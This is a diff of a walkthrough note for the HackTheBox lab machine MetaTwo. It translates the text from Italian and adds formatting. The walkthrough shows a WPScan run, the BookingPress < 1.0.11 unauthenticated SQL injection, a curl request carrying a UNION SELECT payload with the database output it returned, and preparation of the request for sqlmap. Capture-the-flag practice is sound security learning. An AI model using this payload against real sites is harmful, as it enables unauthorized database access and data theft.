--- a/CTF-HackTheBox/Easy/MetaTwo/3. Scan WPScan.md
+++ b/CTF-HackTheBox/Easy/MetaTwo/3. Scan WPScan.md
@@ -1,9 +1,8 @@
+```
 1)  wpscan --url  http://metapress.htb/  --plugins-detection mixed -e ap,at  --api-token <my apitoken>   -t 450 
 
 
-
-
-_______________________________________________________________
+_____________________________________________________________
          __          _______   _____
          \ \        / /  __ \ / ____|
           \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
@@ -434,18 +433,21 @@ Interesting Finding(s):
 [+] Data Received: 45.631 MB
 [+] Memory used: 502.508 MB
 [+] Elapsed time: 00:58:43
-
-2) Abbiamo trovato questa vulenrabilità: 
+```
+2) We found this vulnerability: 
  [!] Title: BookingPress < 1.0.11 - Unauthenticated SQL Injection >
 
-3) Ora dalle Reference andiamo a vedere come si sfrutta
-4) Andiamo nella pagina:  http://metapress.htb/events/
+3) Now from the References let's see how it is exploited
+4) Go in the page:  http://metapress.htb/events/
 
-5) Cerchiamo nel codice sorgente la key-words: "nonce"
+5) We search the source code for the keywords: "nonce"
 
-6)Troviamo questa riga di codice:  var postData = { action:'bookingpress_before_book_appointment', appointment_data: vm.appointment_step_form_data,_wpnonce:'f8ef325342' };
-
-7) Poi faccio questa richiesta :
+6)Let's find this line of code:  
+```javascript
+var postData = { action:'bookingpress_before_book_appointment', appointment_data: vm.appointment_step_form_data,_wpnonce:'f8ef325342' };
+```
+7)  Then I make this request :
+```
 curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=f8ef325342&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
 
@@ -464,13 +466,13 @@ X-Frame-Options: SAMEORIGIN
 Referrer-Policy: strict-origin-when-cross-origin
 
 [{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}] 
-
-8) Ora che abbaimo scoperto la vulnerabilità proviamo a usare sqlmap, per fare ciò apriamo burp mettiamo intercepts e facciamo dal nostro terminale questa richiesta:
-
+```
+8) Now that we have discovered the vulnerability, let's try to use sqlmap, to do this we open burp, put intercepts and make this request from our terminal:
+```
 curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \      --data 'action=bookingpress_front_get_category_services&_wpnonce=224e07b058&category_id=33&total_service=-7502)    -x http://127.0.0.1:8080
-
-9) Ci portiamo la richiesta nel computer:
-
+```
+9)We take the request to the computer:
+```
 ┌──(kali㉿kali)-[~]
 └─$ cat  'sql Inject.req'
 POST /wp-admin/admin-ajax.php HTTP/1.1
@@ -482,6 +484,6 @@ Content-Type: application/x-www-form-urlencoded
 Connection: close
 
 action=bookingpress_front_get_category_services&_wpnonce=224e07b058&category_id=33&total_service=-7502) 
+```
 
-10) 
 
